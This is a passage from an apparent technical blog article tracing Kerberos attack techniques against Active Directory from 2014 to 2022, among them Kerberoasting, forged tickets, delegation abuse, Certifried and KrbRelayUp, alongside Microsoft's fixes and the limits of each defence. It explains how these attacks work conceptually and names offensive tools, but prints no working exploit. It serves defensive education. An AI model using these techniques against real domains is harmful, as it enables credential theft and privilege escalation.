    .map((b) =&amp;gt; b.toString(16).padStart(2, &quot;0&quot;))
    .join(&quot;&quot;);
  return hex;
}&lt;/p&gt;
&lt;p&gt;const password = &quot;Summer2026!&quot;;
const salt = &quot;CONTOSO.COMalice&quot;;
const keyHex = await kerberosStringToKey256(password, salt);
console.log(&quot;PBKDF2-HMAC-SHA1 output (truncated AES-256 key):&quot;, keyHex);
`}&lt;/p&gt;
&lt;p&gt;That 32-byte output is the value LSA stores when an account is configured with &lt;code&gt;msDS-SupportedEncryptionTypes&lt;/code&gt; bit E set. When a Kerberoasting attacker steals the TGS-REP, what they crack offline is which password produces that key. The RFC 3962 post-processing -- a single round of &lt;code&gt;DK(key, &quot;kerberos&quot;)&lt;/code&gt; -- shapes the output to AES key length but does not slow the dictionary attack down. The dispositive defence is not in the cryptography; it is in the password, or more precisely in not having one at all -- the move to gMSA and dMSA replaces typed passwords with KDC-generated random secrets [@ms-gmsa] [@ms-dmsa]).
PBKDF2 at 4,096 iterations is well below modern PHC recommendations -- the 2023 OWASP guideline for PBKDF2-HMAC-SHA1 is 1.3 million iterations [@owasp-password-storage] -- but the 4,096 figure is wired into RFC 3962 and is the same on every supported Windows version. Service accounts using gMSA bypass this entirely: the gMSA&apos;s &quot;password&quot; is a 240-character random secret rotated every 30 days, derived by the Microsoft Key Distribution Service rather than entered by a human [@ms-gmsa].&lt;/p&gt;
&lt;p&gt;The wire in 2026 is therefore six messages and a matrix of seven enctypes. The protocol skeleton is forty years old. In 2014 a SANS instructor named Tim Medin gave a forty-five-minute talk that turned every one of those enctypes into a problem.&lt;/p&gt;
&lt;h2&gt;4. The Attack Cascade: 2014 to 2022&lt;/h2&gt;
&lt;p&gt;September 26-28, 2014. Louisville, Kentucky. DerbyCon 4. Talk slot T120. Tim Medin -- then at Counter Hack Challenges, also a SANS instructor -- walks on stage with a forty-five-minute talk titled &quot;Attacking Microsoft Kerberos: Kicking the Guard Dog of Hades&quot; [@irongeek-derbycon4]. The talk demonstrates that any authenticated domain user can request a TGS for any Service Principal Name in the directory, and that the service-portion of the returned ticket is encrypted under the SPN account&apos;s long-term key -- which, under RC4-HMAC enctype 23, is the NT hash of the password. Cracking the ciphertext is reduced to a dictionary attack against whatever password an admin set on the service account.&lt;/p&gt;
&lt;p&gt;That talk is the moment Kerberos becomes interesting to attackers. The next eight years play out as a cascade. Five generations, each one named after the canonical primitive that defined it, each one exposing a different structural property of the protocol, each one earning its own engineered Microsoft response years later.&lt;/p&gt;

A unique identifier for a service instance in Active Directory, written in the form `service-class/host:port/service-name` (for example `HTTP/web01.contoso.com`). Kerberos uses the SPN to look up which account holds the long-term key that decrypts the service ticket. Any account that has an SPN -- a user account that has had `setspn -A` run against it, every machine account in the directory, every gMSA -- is a candidate for Kerberoasting [@adsecurity-kerberoast].
&lt;h3&gt;Generation 1, 2014: Kerberoasting&lt;/h3&gt;
&lt;p&gt;Tim Medin&apos;s primitive [@irongeek-derbycon4]. Will Schroeder&apos;s PowerShell weaponisation as &lt;code&gt;Invoke-Kerberoast&lt;/code&gt; (later rolled into the C# Rubeus) [@ghostpack-rubeus]. Sean Metcalf&apos;s operational walkthrough on adsecurity.org [@adsecurity-kerberoast]. MITRE catalogued the technique in 2020 as ATT&amp;amp;CK T1558.003, which preserves the structural definition verbatim: &quot;Portions of these tickets may be encrypted with the RC4 algorithm, meaning the Kerberos 5 TGS-REP etype 23 hash of the service account associated with the SPN is used as the private key and is thus vulnerable to offline Brute Force attacks&quot; [@mitre-t1558-003].&lt;/p&gt;
&lt;p&gt;The structural insight is the part that matters. The TGS-REP is encrypted with the service account&apos;s &lt;em&gt;long-term&lt;/em&gt; password-derived key, so any domain user who can issue a TGS-REQ can mine ciphertext offline against any dictionary they care to assemble. The Kerberos protocol has no mechanism by which the KDC could tell whether the requesting user has any business asking for that SPN, because RFC 4120 has no concept of &quot;this service is for these users&quot;. Anyone with a TGT gets the service ticket.&lt;/p&gt;
&lt;p&gt;Microsoft&apos;s &lt;em&gt;dispositive&lt;/em&gt; engineered response did not arrive until ten to twelve years later, even though a partial, not-purpose-built mitigation predated the disclosure. Server 2012 had introduced Group Managed Service Accounts: passwords randomised to 240 characters, derived by the Microsoft Key Distribution Service via &lt;code&gt;kdssvc.dll&lt;/code&gt;, rotated every 30 days, retrievable from a domain controller by member hosts that are explicitly authorised in &lt;code&gt;msDS-GroupMSAMembership&lt;/code&gt; [@ms-gmsa]. Server 2025 then introduced Delegated Managed Service Accounts (dMSA), which take the next structural step: the dMSA&apos;s secret is &quot;derived from the machine account credential&quot; held by the domain controller, and &quot;the secret can&apos;t be retrieved or found anywhere other than on the DC&quot; [@ms-dmsa]. The October 2024 Microsoft Security Blog formalised the Kerberoasting guidance in a single page that names RC4 as the load-bearing weakness and announces the deprecation [@ms-kerberoasting-guidance]. The December 2025 Beyond-RC4 announcement closed the cadence with a calendar date [@ms-beyond-rc4].&lt;/p&gt;
&lt;h3&gt;Generation 2, 2014-2017: Mimikatz Kerberos and AS-REP Roasting&lt;/h3&gt;
&lt;p&gt;Benjamin Delpy publishes &lt;code&gt;mimikatz&lt;/code&gt; 2.0 on April 6, 2014; the v2 banner inside the repository README reads verbatim &lt;code&gt;mimikatz 2.0 alpha (x86) release &quot;Kiwi en C&quot; (Apr 6 2014 22:02:03)&lt;/code&gt; [@mimikatz]. The Kerberos module contains two commands that define the era: &lt;code&gt;kerberos::golden&lt;/code&gt; (forge a TGT from the KRBTGT account&apos;s long-term key, granting Domain Admin equivalence indefinitely) and &lt;code&gt;kerberos::silver&lt;/code&gt; (forge a TGS from any service account&apos;s long-term key, granting impersonation of any user against that service).&lt;/p&gt;
&lt;p&gt;The structural insight: RFC 4120 has no online ticket validation [@rfc4120]. Once a ticket carries the right signatures, the service trusts it. Whoever holds a long-term key forges any ticket that key signs. Possession of a key collapses to ticket forgeability.&lt;/p&gt;
&lt;p&gt;Around 2017, the same team behind Rubeus publicises AS-REP Roasting [@ghostpack-rubeus]: the same offline-cracking primitive as Kerberoasting, but against any account whose &lt;code&gt;userAccountControl&lt;/code&gt; has &lt;code&gt;UF_DONT_REQUIRE_PREAUTH&lt;/code&gt; (the &lt;code&gt;DONT_REQ_PREAUTH&lt;/code&gt; flag) set. With pre-authentication disabled, the KDC will return an AS-REP encrypted under the user&apos;s password-derived key to &lt;em&gt;anyone&lt;/em&gt; who asks for it, no proof of password possession required. The dispositive Microsoft response was already in place: pre-authentication has been required by default for all new Active Directory accounts since Windows 2000, and the flag has to be deliberately cleared by an administrator. The remaining vulnerability is operational hygiene -- finding the handful of legacy accounts an organisation has left with pre-auth disabled.&lt;/p&gt;
&lt;h3&gt;Generation 3, 2018-2020: Delegation Abuse&lt;/h3&gt;
&lt;p&gt;Three primitives in three years.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;SpoolSample / PrinterBug.&lt;/strong&gt; Lee Christensen (tifkin_, SpecterOps) published the PoC on GitHub on October 5, 2018 [@spoolsample]. The MS-RPRN remote-procedure-call interface includes a method, &lt;code&gt;RpcRemoteFindFirstPrinterChangeNotificationEx&lt;/code&gt;, that any authenticated user can invoke against any host&apos;s spooler service to ask the spooler to &lt;em&gt;please call back&lt;/em&gt; to an attacker-controlled address. The spooler obediently authenticates outbound using the machine account&apos;s credentials. Combined with unconstrained Kerberos delegation on the attacker-controlled host, the inbound authentication captures the target machine&apos;s TGT.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Wagging the Dog (RBCD).&lt;/strong&gt; Elad Shamir&apos;s January 28, 2019 post on shenaniganslabs.io [@shenanigans-rbcd]. The TL;DR of the post is the load-bearing structural disclosure: &quot;Resource-based constrained delegation does not require a forwardable TGS when invoking S4U2Proxy. S4U2Self works on any account that has an SPN, regardless of the state of the TrustedToAuthForDelegation attribute. S4U2Proxy always produces a forwardable TGS, even if the provided additional TGS in the request was not forwardable. By default, any domain user can abuse the MachineAccountQuota to create a computer account and set an SPN for it, which makes it even more trivial to abuse resource-based constrained delegation to mimic protocol transition&quot; [@shenanigans-rbcd]. Every clause of that TL;DR points at a documented behaviour. The chain in this article&apos;s Hook is built directly on top.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Bronze Bit.&lt;/strong&gt; Jake Karnes at NetSPI; CVE-2020-17049; disclosed November 10, 2020 [@netspi-bronze-bit] [@cve-2020-17049]. The NVD entry preserves Microsoft&apos;s verbatim description: &quot;A security feature bypass vulnerability exists in the way Key Distribution Center (KDC) determines if a service ticket can be used for delegation via Kerberos Constrained Delegation (KCD). To exploit the vulnerability, a compromised service that is configured to use KCD could tamper with a service ticket that is not valid for delegation to force the KDC to accept it&quot; [@cve-2020-17049]. The bypass: any service in possession of its own long-term key can decrypt the S4U2Self output ticket, flip the &lt;code&gt;forwardable&lt;/code&gt; bit in &lt;code&gt;EncTicketPart&lt;/code&gt;, and re-encrypt with the same key. Pre-2020 the KDC&apos;s S4U2Proxy validation accepted the resulting ticket because nothing on the ticket independently attested whether the &lt;code&gt;forwardable&lt;/code&gt; flag had been set by the KDC or by the service itself. Microsoft&apos;s November 10, 2020 fix, per the NVD entry verbatim, &quot;addresses this vulnerability by changing how the KDC validates service tickets used with KCD&quot; so that the tampered flag is rejected [@cve-2020-17049]. The PAC signatures, contra a common framing, were never meant to cover the &lt;code&gt;EncTicketPart&lt;/code&gt; flag bits in the first place.&lt;/p&gt;
&lt;p&gt;Microsoft&apos;s engineered responses: the November 2020 Bronze Bit patch [@cve-2020-17049] tightened the KDC&apos;s S4U2Proxy ticket-validation step; KB5008383 (November 2021) [@ms-kb-5008383] issued the canonical &quot;set &lt;code&gt;ms-DS-MachineAccountQuota = 0&lt;/code&gt; for non-administrator users&quot; guidance; LDAP signing and channel binding work, ongoing since the &lt;a href=&quot;https://paragmali.com/blog/ntlmless-the-death-of-ntlm-in-windows/&quot; rel=&quot;noopener&quot;&gt;NTLMless&lt;/a&gt; era, became the dispositive control against the relay variant of the chain.&lt;/p&gt;
&lt;h3&gt;Generation 4, 2021-2022: Certificate-Based Ticket Forgery and Kerberos Relay&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Certifried.&lt;/strong&gt; Oliver Lyak (ly4k) at IFCR disclosed CVE-2022-26923 to Microsoft, who patched on May 10, 2022 [@cve-2022-26923]. The attack exploited a quirk of how Active Directory Certificate Services (ADCS) bound a certificate&apos;s identity to an AD account when the certificate was used for PKINIT. Before the strong-mapping fix, AD&apos;s account-lookup at PKINIT time matched the certificate&apos;s Subject Alternative Name (SAN) to an account: a User Principal Name for user certificates, or the DNS name (populated from &lt;code&gt;dNSHostName&lt;/code&gt;) for machine certificates. If an attacker controlled a machine account, they could change the machine&apos;s &lt;code&gt;dNSHostName&lt;/code&gt; to match a domain controller&apos;s, request a certificate via the (overly-permissive) default &lt;code&gt;Machine&lt;/code&gt; template, and use the resulting certificate to PKINIT-authenticate to the KDC as that domain controller. Microsoft&apos;s response is documented end-to-end in KB5014754 [@ms-kb-5014754]: a new &quot;strong certificate mapping&quot; requirement that pins each issued certificate to a specific account SID via an X.509 extension (OID 1.3.6.1.4.1.311.25.2). The original release moved to Compatibility mode on May 10, 2022; full Enforcement mode took effect on February 11, 2025; Disabled-mode rollback was removed on April 11, 2023; the remaining Compatibility-mode fallback was removed on September 9, 2025 [@ms-kb-5014754].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;KrbRelayUp.&lt;/strong&gt; Mor Davidovich (&lt;code&gt;Dec0ne&lt;/code&gt;), April 24, 2022 [@krbrelayup]. The README&apos;s universal-no-fix-LPE framing is preserved in the PullQuote below. The chain wraps &lt;code&gt;Powermad&lt;/code&gt; (machine account creation), &lt;code&gt;KrbRelay&lt;/code&gt; (Kerberos relay to LDAP), Rubeus (S4U2Self bypass of Protected Users, RBCD privilege addition), and &lt;code&gt;SCMUACBypass&lt;/code&gt; (a wrapper that uses the resulting ticket to open the local Service Control Manager and create a service running as &lt;code&gt;NT AUTHORITY\SYSTEM&lt;/code&gt;). The class of attack is &quot;Kerberos relay&quot; -- the post-NTLM cousin of NTLM-relay. The dispositive control is not a Kerberos patch; it is domain-wide LDAP signing plus channel binding plus Extended Protection for Authentication on ADCS Web Enrolment.&lt;/p&gt;

A universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings). -- Mor Davidovich, KrbRelayUp README, April 2022 [@krbrelayup]
&lt;h3&gt;Generation 5, 2022-2023: Forged-Ticket Sophistication&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Diamond Ticket.&lt;/strong&gt; Charlie Clark at Semperis co-authored a blog post in 2022 with Andrew Schwartz at TrustedSec disclosing the modern Diamond Ticket technique [@semperis-diamond] [@trustedsec-diamond]. The Semperis byline names the antecedent: a 2015 Black Hat EU presentation by Tal Be&apos;ery and Michael Cherny (&quot;Watching the Watchdog&quot;) that introduced the &quot;Diamond PAC&quot; idea. Verbatim from the Semperis post: &quot;Golden Ticket attacks take advantage of the ability to forge a ticket granting ticket (TGT) from scratch, Diamond Ticket attacks take advantage of the ability to decrypt and re-encrypt genuine TGTs requested from a domain controller (DC)&quot; [@semperis-diamond]. The structural insight is that a Diamond Ticket has a &lt;em&gt;legitimately issued, KDC-signed&lt;/em&gt; PAC at its base; only the privilege-claim fields inside the PAC are tampered. Before the November 2022 Full PAC Signature fix, no &lt;em&gt;krbtgt-keyed&lt;/em&gt; signature covered the entire encoded PAC: the Server Signature spanned the whole PAC but used the service&apos;s own (recomputable) key, while the KDC Signature covered only the Server Signature&apos;s bytes. That left room for a key-holder to modify PAC fields and recompute the coverage they could reach.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Sapphire Ticket.&lt;/strong&gt; Charlie Bromberg, also known online as &quot;Shutdown&quot;, at Synacktiv [@pgj11-diamond-sapphire] [@thehacker-recipes-sapphire]. The community wiki The Hacker Recipes, which Bromberg maintains, documents the Sapphire Ticket technique end-to-end at &lt;code&gt;thehacker.recipes/a-d/movement/kerberos/forged-tickets/sapphire&lt;/code&gt; [@thehacker-recipes-sapphire]. The verifiable third-party attribution lives at pgj11.com, which records verbatim: &quot;One brand new technique is Sapphire Ticket. Created by Charlie Shutdown (twitter.com/_nwodtuhs) this approach is more stealthy. You can create a TGT impersonating any user assembling real TGT and real PAC combining S4U2Self + U2U ... He extended Ticketer from Impacket to add this attack&quot; [@pgj11-diamond-sapphire]. The Sapphire Ticket bolts a &lt;em&gt;legitimately KDC-issued&lt;/em&gt; PAC (obtained by chaining the S4U2Self and User-to-User Kerberos extensions to request a service ticket &lt;em&gt;to oneself&lt;/em&gt; with the PAC of an arbitrary target user) onto a Diamond-style ticket. The result presents PAC signatures that the KDC itself produced. Unit 42&apos;s December 2022 &quot;Next-Gen Kerberos Attacks&quot; writeup is the secondary that joined Diamond and Sapphire into the same article and named them collectively the &quot;Precious Gemstones&quot; [@unit42-precious-gemstones].
Some secondary sources attribute Sapphire Ticket to Charlie Clark of Semperis. The misattribution probably stems from Clark&apos;s separate &quot;AS Requested STs&quot; post on the Semperis blog, which discusses a different technique exploiting unarmored machine-account AS-REQs and is not the Sapphire Ticket primary [@semperis-as-sts]. The verified Sapphire-Ticket originator is Charlie Bromberg (Shutdown, Synacktiv) per [@pgj11-diamond-sapphire].
The adsecurity.org URL &lt;code&gt;?p=2293&lt;/code&gt; is Sean Metcalf&apos;s &quot;Cracking Kerberos TGS Tickets Using Kerberoast -- Exploiting Kerberos to Compromise the Active Directory Domain&quot; (not Metcalf&apos;s separate KRBTGT-account post, which lives at a different URL). The page is the operational walkthrough that pairs with Tim Medin&apos;s 2014 DerbyCon disclosure [@adsecurity-kerberoast].&lt;/p&gt;
&lt;p&gt;Microsoft&apos;s engineered response to both Diamond and Sapphire was CVE-2022-37967, the KrbtgtFullPacSignature [@cve-2022-37967] [@ms-kb-5021131]. It is the first PAC-handling protocol change since Windows 2000&apos;s introduction of the PAC. After full enforcement, the KDC adds a &lt;em&gt;Full PAC Signature&lt;/em&gt; that covers the entire encoded PAC, not just the existing sub-signatures. Diamond and Sapphire variants that modify any PAC field beyond what the Server and KDC sub-signatures already covered will fail validation.&lt;/p&gt;

The accounts most vulnerable to Kerberoasting are those with weak passwords and those that use weaker encryption algorithms, especially RC4. RC4 is more susceptible to the cyberattack because it uses no salt or iterated hash when converting a password to an encryption key, allowing the cyberthreat actor to guess more passwords quickly. -- Microsoft Security Blog, October 11, 2024 [@ms-kerberoasting-guidance]
&lt;h3&gt;The Spine Table&lt;/h3&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Generation&lt;/th&gt;
&lt;th&gt;Year&lt;/th&gt;
&lt;th&gt;Primitive&lt;/th&gt;
&lt;th&gt;Structural Insight&lt;/th&gt;
&lt;th&gt;Microsoft Response&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;2014&lt;/td&gt;
&lt;td&gt;Kerberoasting [@irongeek-derbycon4]&lt;/td&gt;
&lt;td&gt;TGS-REP is encrypted with the SPN account&apos;s long-term key; offline-crackable&lt;/td&gt;
&lt;td&gt;gMSA (2012) [@ms-gmsa]; dMSA (2025) [@ms-dmsa]; Beyond-RC4 (2025-2026) [@ms-beyond-rc4]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;2014-2017&lt;/td&gt;
&lt;td&gt;Golden / Silver Ticket [@mimikatz]; AS-REP Roasting [@ghostpack-rubeus]&lt;/td&gt;
&lt;td&gt;RFC 4120 has no online ticket validation [@rfc4120]; long-term key = forge equivalence&lt;/td&gt;
&lt;td&gt;KrbtgtFullPacSignature (2022) [@cve-2022-37967]; preauth-required default since Windows 2000&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;2018-2020&lt;/td&gt;
&lt;td&gt;SpoolSample [@spoolsample]; RBCD [@shenanigans-rbcd]; Bronze Bit [@cve-2020-17049]&lt;/td&gt;
&lt;td&gt;MS-RPRN coercion; S4U2Proxy always returns forwardable; pre-2020 KDC did not independently validate the EncTicketPart flags&lt;/td&gt;
&lt;td&gt;Bronze Bit patch (Nov 2020); KB5008383 MachineAccountQuota=0 (Nov 2021); LDAP signing&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;4&lt;/td&gt;
&lt;td&gt;2022&lt;/td&gt;
&lt;td&gt;Certifried [@cve-2022-26923]; KrbRelayUp [@krbrelayup]&lt;/td&gt;
&lt;td&gt;ADCS template SAN-binding ambiguity; LDAP defaults unsigned&lt;/td&gt;
&lt;td&gt;KB5014754 strong-mapping [@ms-kb-5014754]; LDAP signing + EPA on /certsrv/&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;5&lt;/td&gt;
&lt;td&gt;2022&lt;/td&gt;
&lt;td&gt;Diamond [@semperis-diamond]; Sapphire [@pgj11-diamond-sapphire] [@unit42-precious-gemstones]&lt;/td&gt;
&lt;td&gt;PAC sub-signatures did not cover the encoded PAC structure&lt;/td&gt;
&lt;td&gt;KrbtgtFullPacSignature (CVE-2022-37967, Nov 2022) [@cve-2022-37967]&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;

timeline
    title Kerberos attack cascade
    section 2014
      Sep 2014 : Kerberoasting (Tim Medin, DerbyCon 4)
      Apr 2014 : Mimikatz 2.0 (Golden / Silver Tickets)
    section 2017
      2017 : AS-REP Roasting (Rubeus weaponisation)
    section 2018-2020
      Oct 2018 : SpoolSample (PrinterBug, Lee Christensen)
      Jan 2019 : Wagging the Dog / RBCD (Elad Shamir)
      Nov 2020 : Bronze Bit (Jake Karnes, NetSPI)
    section 2022
      Apr 2022 : KrbRelayUp (Mor Davidovich)
      May 2022 : Certifried (Oliver Lyak / ly4k)
      2022 : Diamond Ticket (Clark / Schwartz)
      2022 : Sapphire Ticket (Charlie Bromberg)
      Nov 2022 : KrbtgtFullPacSignature (Microsoft fix)
&lt;p&gt;Eight years. Eleven structural primitives. One protocol. By 2022 the cascade slowed, not because the protocol got better, but because every primitive a thirty-three-year-old design &lt;em&gt;could&lt;/em&gt; expose had been exposed. The 2022 Microsoft response, KrbtgtFullPacSignature, was the first one that targeted the &lt;em&gt;structural&lt;/em&gt; properties (PAC coverage of its own structure) rather than the per-primitive patches that defined the 2014-2020 era. To see why that was a turning point, it helps to see exactly what the defensive cadence looked like before then.&lt;/p&gt;
&lt;h2&gt;5. The Defensive Cadence Before 2023&lt;/h2&gt;
&lt;p&gt;Each of the eleven primitives in Section 4 shipped with a fix. By 2022 every named primitive &lt;em&gt;had&lt;/em&gt; a fix. And yet the cascade kept producing new primitives. Why?&lt;/p&gt;
&lt;p&gt;The answer is in the shape of the defensive controls. Walk them in chronological order.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Protected Users (Server 2012 R2, October 2013) [@ms-server-2012-r2].&lt;/strong&gt; A new security group that triggers five non-configurable client-side protections and four non-configurable domain-controller-side protections [@ms-protected-users]. The client side: CredSSP &quot;doesn&apos;t cache the user&apos;s plain text credentials&quot;; Windows Digest &quot;doesn&apos;t cache the user&apos;s plaintext credentials&quot;; &quot;NTLM stops caching the user&apos;s plaintext credentials or NT one-way function (NTOWF)&quot;; &quot;Kerberos stops creating Data Encryption Standard (DES) or RC4 keys ... or long-term keys after acquiring the initial Ticket Granting Ticket (TGT)&quot;; &quot;The system doesn&apos;t create a cached verifier at user sign-in or unlock&quot; [@ms-protected-users]. The domain-controller side, also verbatim: members &quot;cannot authenticate with NTLM authentication ... use DES or RC4 encryption types in Kerberos preauthentication ... delegate with unconstrained or constrained delegation ... renew Kerberos TGTs beyond their initial four-hour lifetime&quot; [@ms-protected-users]. The limit is the obvious one: Protected Users breaks every workflow that relied on delegation, RC4, or NTLM, and there are many such workflows still in production.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Authentication Policy Silos (Server 2012 R2).&lt;/strong&gt; A scope construct that lets administrators apply Protected-Users-equivalent constraints (no RC4, no unconstrained delegation, mandatory FAST) to tiered subsets of an organisation rather than per-account. The standard tier-zero / tier-one / tier-two split fits neatly under three silos [@ms-privileged-access].&lt;/p&gt;

A container of users, computers, and managed service accounts in Active Directory that scopes a single authentication policy. Members can be required to authenticate only from designated hosts, must use AES enctypes, may be excluded from delegation, and (when paired with FAST armoring) sign their AS-REQ inside a machine-account or anonymous-PKINIT armor. Available since Server 2012 R2; the operational granularity that Protected Users does not provide on its own [@ms-protected-users].
&lt;p&gt;&lt;strong&gt;Restricted Admin (2014) and Remote Credential Guard (2016) [@ms-remote-credential-guard].&lt;/strong&gt; The RDP-side companions that block credential exposure on the target host. Both work by changing what gets sent on the wire during a remote sign-in: Restricted Admin (Windows 8.1 / Server 2012 R2 era) uses the user&apos;s TGT to authenticate via Kerberos network logon, so no credentials reach the target; Remote Credential Guard (Windows 10 1607, August 2016) performs the same trick but for interactive sessions, redirecting CredSSP back to the originating workstation [@ms-remote-credential-guard].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Credential Guard (Windows 10 RTM, 2015) [@ms-credential-guard].&lt;/strong&gt; Virtualization-Based-Security-isolated LSASS: secrets that LSASS would otherwise hold in user-mode memory are moved into the LSAISO trustlet running in Virtual Trust Level 1. SYSTEM on the box cannot read VTL1 memory. Credential Guard is the ceiling against memory-side ticket and key theft, and is one of the cross-link points to the &lt;a href=&quot;https://paragmali.com/blog/ntlmless-the-death-of-ntlm-in-windows/&quot; rel=&quot;noopener&quot;&gt;NTLMless&lt;/a&gt; companion article.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;FAST armoring (RFC 6113, April 2011).&lt;/strong&gt; Sam Hartman and Larry Zhu&apos;s &quot;A Generalized Framework for Kerberos Pre-Authentication&quot; defines the FAST (Flexible Authentication Secure Tunneling) channel [@rfc6113]. The AS-REQ is wrapped in an outer armor envelope, keyed under the machine account&apos;s TGT (for a domain-joined client), an anonymous PKINIT TGT (for a non-domain-joined client), or a compound identity. The armor envelope encrypts the PA-ENC-TIMESTAMP blob and authenticates the entire request, closing the offline-cracking path that targets the encrypted-timestamp pre-auth. The limit: FAST is client opt-in, not on by default, and Server 2012 R2 domain functional level is the floor for compound identity. Many production environments still do not require FAST on their tier-zero accounts.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;gMSA (Server 2012).&lt;/strong&gt; The dispositive Kerberoasting defence for service accounts [@ms-gmsa]. The Microsoft Key Distribution Service (&lt;code&gt;kdssvc.dll&lt;/code&gt;) computes a 240-character random password, rotated every 30 days, and member hosts authorised in &lt;code&gt;msDS-GroupMSAMembership&lt;/code&gt; can retrieve it from a domain controller. The decisive property that gMSA closes is the human-typed-password assumption: there is no password to remember, write down, or share.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;LDAP signing and channel binding.&lt;/strong&gt; The dispositive KrbRelayUp defence. Set &lt;code&gt;LDAPServerIntegrity = 2&lt;/code&gt; to require signing on every LDAP bind, and &lt;code&gt;LdapEnforceChannelBinding = 2&lt;/code&gt; to require channel binding on TLS-bound LDAP connections. Both are off by default in older domain functional levels, which is exactly the default the [@krbrelayup] README is targeting when it calls itself &quot;no-fix&quot;.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;KrbtgtFullPacSignature (November 2022).&lt;/strong&gt; The first PAC-handling protocol change since Windows 2000&apos;s introduction of the PAC. After full enforcement, every PAC carries an additional Full PAC Signature covering the entire encoded structure, not just sub-pieces; this closes PAC modification by parties that do not hold the krbtgt key. It does not stop a krbtgt-key holder (Golden or Diamond), nor Sapphire-class variants that obtain a legitimate KDC-issued PAC via S4U2Self [@cve-2022-37967] [@ms-kb-5021131].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;MachineAccountQuota = 0 guidance (KB5008383, November 2021) [@ms-kb-5008383].&lt;/strong&gt; The dispositive RBCD defence as a configuration: setting the directory-wide &lt;code&gt;ms-DS-MachineAccountQuota&lt;/code&gt; attribute on the domain root to zero prevents non-administrative users from creating computer accounts at all, which kills the first step of the chain in Section 1&apos;s Hook.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Each defensive control patches a primitive. No control patches the structural property of the protocol -- that any long-term symmetric key is forge-equivalent for every ticket type that key signs, and that the protocol&apos;s offline-validation guarantee makes online ticket revocation incompatible with the design.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Defence&lt;/th&gt;
&lt;th&gt;Target Primitive&lt;/th&gt;
&lt;th&gt;Structural Limit&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Protected Users [@ms-protected-users]&lt;/td&gt;
&lt;td&gt;Pass-the-Hash, Pass-the-Ticket, RC4 pre-auth&lt;/td&gt;
&lt;td&gt;Breaks delegation, RC4, and NTLM; four-hour TGT cap may break legacy apps&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Authentication Policy Silo [@ms-protected-users]&lt;/td&gt;
&lt;td&gt;Per-tier scope of Protected-Users behaviour&lt;/td&gt;
&lt;td&gt;Requires Server 2012 R2 DFL; FAST armoring requires Server 2012 R2 too&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Credential Guard&lt;/td&gt;
&lt;td&gt;LSASS memory theft (Mimikatz &lt;code&gt;sekurlsa::&lt;/code&gt;)&lt;/td&gt;
&lt;td&gt;Does not prevent ticket theft via legitimate Kerberos APIs&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;FAST (RFC 6113) [@rfc6113]&lt;/td&gt;
&lt;td&gt;PA-ENC-TIMESTAMP offline cracking&lt;/td&gt;
&lt;td&gt;Client opt-in; not on by default&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;gMSA [@ms-gmsa]&lt;/td&gt;
&lt;td&gt;Kerberoasting on service accounts&lt;/td&gt;
&lt;td&gt;Human-managed service accounts unaffected&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;LDAP signing + channel binding&lt;/td&gt;
&lt;td&gt;KrbRelayUp [@krbrelayup]&lt;/td&gt;
&lt;td&gt;Off by default in older domains&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;KrbtgtFullPacSignature [@cve-2022-37967]&lt;/td&gt;
&lt;td&gt;Diamond and most Sapphire variants&lt;/td&gt;
&lt;td&gt;Does not stop Sapphire variants whose tampered PAC was issued legitimately&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;MachineAccountQuota = 0&lt;/td&gt;
&lt;td&gt;RBCD chain [@shenanigans-rbcd]&lt;/td&gt;
&lt;td&gt;Default value is &lt;code&gt;10&lt;/code&gt;; setting requires admin action&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;Read the table the way an attacker reads it. Each row is necessary; no row is sufficient. The &quot;structural limit&quot; column is the next-attack catalogue. Protected Users does not stop a Diamond Ticket forged from a stolen KRBTGT key. Credential Guard does not stop the operator who has SYSTEM on a domain controller. FAST does not stop AS-REP Roasting (because AS-REP Roasting only happens on accounts with pre-auth disabled, where FAST is moot). gMSA does not protect a service account someone still manages manually with a Notes-saved password.&lt;/p&gt;
